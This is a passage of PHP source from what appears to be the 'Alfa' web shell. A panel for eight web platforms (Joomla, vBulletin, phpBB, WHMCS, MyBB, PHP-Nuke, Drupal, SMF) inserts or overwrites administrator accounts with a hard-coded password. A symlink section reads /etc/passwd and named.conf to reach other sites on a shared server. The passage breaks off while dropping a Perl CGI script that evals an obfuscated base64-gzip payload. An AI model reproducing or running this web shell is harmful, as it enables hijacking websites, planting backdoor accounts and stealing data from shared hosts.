  4405.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4406.  'td5' =>
  4407.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
  4408.  'td6' =>
  4409.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4410.  'td7' =>
  4411.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4412.  'td8' =>
  4413.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4414. );
  4415. create_table($table);
  4416. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4417. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4418. $localhost = $_POST['alfa3'];
  4419. $database = $_POST['alfa4'];
  4420. $username = $_POST['alfa5'];
  4421. $password = $_POST['alfa6'];
  4422. $admin = $_POST['alfa8'];
  4423. $SQL = $_POST['alfa9'];
  4424. $prefix = $_POST['alfa10'];
  4425. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4426. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
  4427. $solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
  4428. $sole =@mysqli_num_rows($solevisible);
  4429. if ($sole == 1){
  4430. $solevis =@mysqli_fetch_assoc($solevisible);
  4431. $res = $solevis['id'];
  4432. }
  4433. $solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
  4434. if($solevisible){
  4435. __alert('Success... '.$admin.' is created...');}
  4436. }
  4437. }
  4438. if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
  4439.  
  4440. echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
  4441. $table = array('td1' =>
  4442.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4443.  'td2' =>
  4444.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4445.  'td3' =>
  4446.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4447.  'td4' =>
  4448.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4449.  'td5' =>
  4450.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4451.  'td6' =>
  4452.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4453.  'td7' =>
  4454.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4455.  'td8' =>
  4456.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4457. );
  4458. create_table($table);
  4459. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4460. if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4461. $localhost = $_POST['alfa2'];
  4462. $database = $_POST['alfa3'];
  4463. $username = $_POST['alfa5'];
  4464. $password = $_POST['alfa6'];
  4465. $prefix = $_POST['alfa7'];
  4466. $admin = $_POST['alfa8'];
  4467. $SQL = $_POST['alfa9'];
  4468. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4469. $solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
  4470. $solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
  4471. $sole = mysqli_num_rows($solevisible);
  4472. if($sole == 1){
  4473. $solevis = mysqli_fetch_assoc($solevisible);
  4474. $res = $solevis['userid'];
  4475. }
  4476. $solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysqli_error($conn));
  4477. if($solevisible){
  4478. __alert('Success... '.$admin.' is created...');}
  4479. }
  4480. }
  4481. if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){
  4482.  
  4483. echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
  4484. $table = array('td1' =>
  4485.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4486.  'td2' =>
  4487.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4488.  'td3' =>
  4489.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4490.  'td4' =>
  4491.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4492.  'td5' =>
  4493.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4494.  'td6' =>
  4495.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4496.  'td7' =>
  4497.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4498.  'td8' =>
  4499.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4500. );
  4501. create_table($table);
  4502. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4503. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4504. $localhost = $_POST['alfa2'];
  4505. $database = $_POST['alfa3'];
  4506. $username = $_POST['alfa4'];
  4507. $password = $_POST['alfa6'];
  4508. $admin = $_POST['alfa8'];
  4509. $SQL = $_POST['alfa9'];
  4510. $prefix = $_POST['alfa10'];
  4511. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4512. $hash = md5('solevisible');
  4513. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
  4514. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
  4515. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
  4516. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
  4517. $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
  4518. if($solevisible){
  4519. __alert('Success... '.$admin.' is created...');
  4520. }
  4521. }
  4522. }
  4523. if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){
  4524.  
  4525. echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
  4526. $table = array('td1' =>
  4527.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4528.  'td2' =>
  4529.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4530.  'td3' =>
  4531.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4532.  'td4' =>
  4533.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4534.  'td6' =>
  4535.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4536.  'td7' =>
  4537.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4538.  'td8' =>
  4539.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4540. );
  4541. create_table($table);
  4542. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4543. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4544. $localhost = $_POST['alfa2'];
  4545. $database = $_POST['alfa3'];
  4546. $username = $_POST['alfa4'];
  4547. $password = $_POST['alfa5'];
  4548. $admin = $_POST['alfa8'];
  4549. $SQL = $_POST['alfa9'];
  4550. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4551. $solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
  4552. if($solevisible){
  4553. __alert('Success... '.$admin.' is created...');}
  4554. }
  4555. }
  4556. if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){
  4557.  
  4558. echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
  4559. $table = array('td1' =>
  4560.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4561.  'td2' =>
  4562.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4563.  'td3' =>
  4564.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4565.  'td4' =>
  4566.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4567.  'td5' =>
  4568.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4569.  'td6' =>
  4570.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4571.  'td7' =>
  4572.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4573.  'td8' =>
  4574.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4575. );
  4576. create_table($table);
  4577. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4578. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4579. $localhost = $_POST['alfa2'];
  4580. $database = $_POST['alfa3'];
  4581. $username = $_POST['alfa4'];
  4582. $password = $_POST['alfa5'];
  4583. $admin = $_POST['alfa8'];
  4584. $SQL = $_POST['alfa9'];
  4585. $prefix = $_POST['alfa10'];
  4586. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4587. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
  4588. if($solevisible){
  4589. __alert('Success... '.$admin.' is created...');}
  4590. }
  4591. }
  4592. if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){
  4593.  
  4594. echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
  4595. $table = array('td1' =>
  4596.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4597.  'td2' =>
  4598.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4599.  'td3' =>
  4600.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4601.  'td4' =>
  4602.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4603.  'td5' =>
  4604.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4605.  'td6' =>
  4606.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4607.  'td7' =>
  4608.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4609.  'td8' =>
  4610.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4611. );
  4612. create_table($table);
  4613. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4614. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4615. $localhost = $_POST['alfa2'];
  4616. $database = $_POST['alfa3'];
  4617. $username = $_POST['alfa4'];
  4618. $password = $_POST['alfa5'];
  4619. $admin = $_POST['alfa7'];
  4620. $SQL = $_POST['alfa9'];
  4621. $prefix = $_POST['alfa10'];
  4622. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4623. $hash = md5($pwd);
  4624. $solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
  4625. if($solevisible){
  4626. __alert('Success... '.$admin.' is created...');}
  4627. }
  4628. }
  4629. if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){
  4630.  
  4631. echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
  4632. $table = array('td1' =>
  4633.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4634.  'td2' =>
  4635.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4636.  'td3' =>
  4637.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4638.  'td4' =>
  4639.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4640.  'td6' =>
  4641.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4642.  'td7' =>
  4643.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
  4644.  );
  4645. create_table($table);
  4646. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4647. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4648. $localhost = $_POST['alfa2'];
  4649. $database = $_POST['alfa4'];
  4650. $username = $_POST['alfa5'];
  4651. $password = $_POST['alfa6'];
  4652. $admin = $_POST['alfa8'];
  4653. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4654. $getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
  4655. $getDescuid = @mysqli_fetch_assoc($getDescuid);
  4656. $getDescuid = $getDescuid['uid'];
  4657. $getdescuid = $getDescuid++;
  4658. $solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
  4659. $solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
  4660. $sole = mysqli_num_rows($solevisible);
  4661. if ($sole == 1){
  4662. $solevis = mysqli_fetch_assoc($solevisible);
  4663. $res = $solevis['uid'];
  4664. }
  4665. $solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
  4666. if($solevisible){
  4667. __alert('Success... '.$admin.' is created...');}
  4668. }
  4669. }
  4670.  
  4671. if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){
  4672.  
  4673. echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
  4674. $table = array('td1' =>
  4675.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4676.  'td2' =>
  4677.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4678.  'td3' =>
  4679.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4680.  'td4' =>
  4681.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4682.  'td5' =>
  4683.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
  4684.  'td6' =>
  4685.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4686.  'td7' =>
  4687.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4688.  );
  4689. create_table($table);
  4690. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4691. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4692. $localhost = $_POST['alfa2'];
  4693. $database = $_POST['alfa3'];
  4694. $username = $_POST['alfa5'];
  4695. $password = $_POST['alfa6'];
  4696. $prefix = $_POST['alfa7'];
  4697. $admin = $_POST['alfa8'];
  4698. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4699. $setpwAlg = sha1(strtolower($admin) . 'solevisible');
  4700. $solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
  4701. if($solevisible){
  4702. __alert('Success... '.$admin.' is created...');}
  4703. }
  4704. }
  4705. echo "</div>";
  4706. alfafooter();
  4707. }
  4708. function alfaMakePwd(){
  4709.     if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
  4710.         return "/home/{user}/public_html/";
  4711.     }
  4712.     $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
  4713.     $public = end($document);
  4714.     array_pop($document);
  4715.     array_pop($document);
  4716.     $path = implode("/", $document) . "/{user}/" . $public;
  4717.     return $path;
  4718. }
  4719. function alfaGetDomains($state = false){
  4720.     $state = "named.conf";
  4721.     $lines = array();
  4722.     $lines = _alfa_file('/etc/named.conf');
  4723.     if(!$lines){
  4724.         $lines = @scandir("/etc/valiases/");
  4725.         $state = "valiases";
  4726.         if(!$lines){
  4727.             $lines = @scandir("/var/named");
  4728.             $state = "named";
  4729.             if(!$lines && $state){
  4730.                 $lines = _alfa_file('/etc/passwd');
  4731.                 $state = "passwd";
  4732.             }
  4733.         }
  4734.     }
  4735.     return array("lines" => $lines, "state" => $state);
  4736. }
  4737. function alfasymlink(){
  4738. alfahead();
  4739. AlfaNum(9,10);
  4740. echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
  4741. if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
  4742.     $sympath = alfaMakePwd();
  4743.     @mkdir('cgialfa',0755);
  4744.     @chdir('cgialfa');
  4745.     alfacgihtaccess('cgi');
  4746.     $perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';
